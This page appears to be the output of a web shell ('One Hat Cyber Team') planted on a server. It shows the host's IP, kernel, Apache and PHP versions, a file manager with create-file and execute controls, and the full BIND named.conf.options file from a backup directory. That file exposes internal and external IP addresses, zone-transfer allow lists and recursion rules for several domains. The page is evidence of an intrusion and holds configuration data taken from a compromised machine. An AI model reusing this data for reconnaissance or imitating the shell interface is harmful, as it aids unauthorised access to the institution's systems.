One Hat Cyber Team
Your IP :
216.73.216.135
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
backup
/
dad
/
etc
/
bind
/
View File Name :
named.conf.options
options { directory "/var/cache/bind"; // If there is a firewall between you and nameservers you want // to talk to, you may need to fix the firewall to allow multiple // ports to talk. See http://www.kb.cert.org/vuls/id/800113 // If your ISP provided one or more IP addresses for stable // nameservers, you probably want to use them as forwarders. // Uncomment the following block, and insert the addresses replacing // the all-0's placeholder. // forwarders { // 0.0.0.0; // }; //======================================================================== // If BIND logs error messages about the root key being expired, // you will need to update your keys. See https://www.isc.org/bind-keys //======================================================================== dnssec-validation auto; auth-nxdomain no; # conform to RFC1035 listen-on-v6 { any; }; listen-on port 53 { 127.0.0.1; 192.168.1.1; 194.44.31.57; }; allow-query { 0.0.0.0/0; }; allow-recursion { localhost; 192.168.0.0/16; }; }; zone "imath.kiev.ua" IN { type master; notify yes; file "/etc/bind/imath.kiev.ua.zone"; allow-transfer { 192.168.1.3; 192.168.1.4; 195.149.112.1; 193.201.116.135; 193.201.116.2; }; also-notify { 192.168.1.3; 195.149.112.1; 193.201.116.135; 193.201.116.2; }; }; zone "mathsociety.kiev.ua" IN { type master; notify yes; file "/etc/bind/mathsociety.kiev.ua.zone"; allow-transfer { 193.201.116.2; }; also-notify { 193.201.116.2; }; }; zone "zaretsky.kiev.ua" IN { type master; notify yes; file "/etc/bind/zaretsky.kiev.ua.zone"; allow-transfer { 195.24.128.164; }; also-notify { 195.24.128.164; }; };